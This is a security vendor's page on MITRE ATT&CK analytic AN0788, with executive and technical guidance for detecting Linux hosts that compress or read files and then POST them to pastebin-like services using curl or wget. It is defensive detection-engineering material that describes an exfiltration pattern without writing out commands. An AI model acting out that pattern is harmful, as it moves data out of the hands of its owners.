Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0788: Analytic 0788

Use of curl, wget, or custom scripts to POST data to pastebin-like services. Defender perspective: identify chained behavior where files are compressed/read followed by HTTPS POST requests to text-sharing endpoints.

EnterpriseAN0788AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic is about spotting Linux hosts that package or read files and then send data over HTTPS POST to pastebin-like text-sharing services using curl, wget, or scripts. For leaders, the value is not the specific tool name; it is whether the organization can recognize suspicious outbound data movement to low-friction external sharing sites before it becomes an incident-response and data-governance problem.

Executive priority

Prioritize this as a validation item for Linux monitoring, outbound web visibility, and data-handling controls. Security leaders should ask whether SOC teams can connect file access or compression activity with subsequent HTTPS POSTs to external text-sharing endpoints, and whether evidence would be sufficient for incident triage, audit support, and containment decisions. Because the ATT&CK object provides no tactic, relationship, or mitigation context, treat it as a focused detection engineering use case rather than a complete risk scenario.

Technical view

For Linux environments, validate whether endpoint and network telemetry can correlate chained behavior: files being compressed or read, followed by curl, wget, or script-driven HTTPS POST requests to pastebin-like services. Since no official detection logic is provided, detection teams should build or review analytics around process execution, command-line arguments where available, file read/archive activity, destination categorization, HTTP method visibility, and timing correlation. Tune carefully for legitimate automation, developer workflows, CI/CD jobs, and administrative scripts that may post logs or text externally.

Likely telemetry

  • Linux process execution events for curl, wget, shells, interpreters, and custom scripts
  • Command-line arguments and parent/child process context where collected
  • File read and compression/archive activity on Linux hosts
  • Network connection metadata for outbound HTTPS sessions
  • HTTP method and destination details where proxy, secure web gateway, or TLS inspection policies provide them

Detection direction

  • Confirm that Linux telemetry includes both endpoint activity and outbound web/network evidence; either source alone may miss the chained behavior described by MITRE.
  • Correlate file compression or file read activity with near-term HTTPS POST activity to text-sharing endpoints rather than alerting only on curl or wget usage.
  • Maintain allowlists or baselines for approved automation, developer tooling, monitoring jobs, and CI/CD workflows to reduce false positives.
  • Review visibility gaps caused by encrypted HTTPS, limited command-line logging, missing proxy logs, or unmanaged Linux servers.
  • Use destination reputation or category data cautiously; pastebin-like services may change domains or overlap with legitimate business use.

Mitigation priorities

  • Establish approved-use policy and monitoring expectations for external text-sharing services from Linux systems.
  • Restrict or review outbound access to pastebin-like services where business need is low, using existing egress control processes.
  • Improve Linux endpoint logging for process execution, command-line capture, file activity, and script execution where appropriate.
  • Ensure web proxy, DNS, or network controls retain enough metadata to support SOC and incident-response review of HTTPS POST activity.
  • Document exceptions for legitimate automation so detections can distinguish expected workflows from unusual data posting behavior.
Analyst notes and limits

The object is a detection analytic, AN0788, for the enterprise ATT&CK domain and Linux platform. It describes identifying chained behavior involving file compression or reading followed by HTTPS POST requests to pastebin-like endpoints via curl, wget, or scripts. No official detection logic, tactics, labels, aliases, or relationship context were supplied, so this take focuses on validation and control questions derived from the provided description.

This assessment is limited to the supplied ATT&CK fields and external reference. It does not establish adversary attribution, active exploitation, impact, specific ATT&CK tactics, non-Linux applicability, or guaranteed detection coverage. Local environment telemetry, business use of text-sharing services, and egress architecture are required to determine materiality and detection feasibility.

Official MITRE ATT&CK definition

Analytic 0788

Use of curl, wget, or custom scripts to POST data to pastebin-like services. Defender perspective: identify chained behavior where files are compressed/read followed by HTTPS POST requests to text-sharing endpoints.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
5b53b8485154f41c...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 5b53b8485154…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0788
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use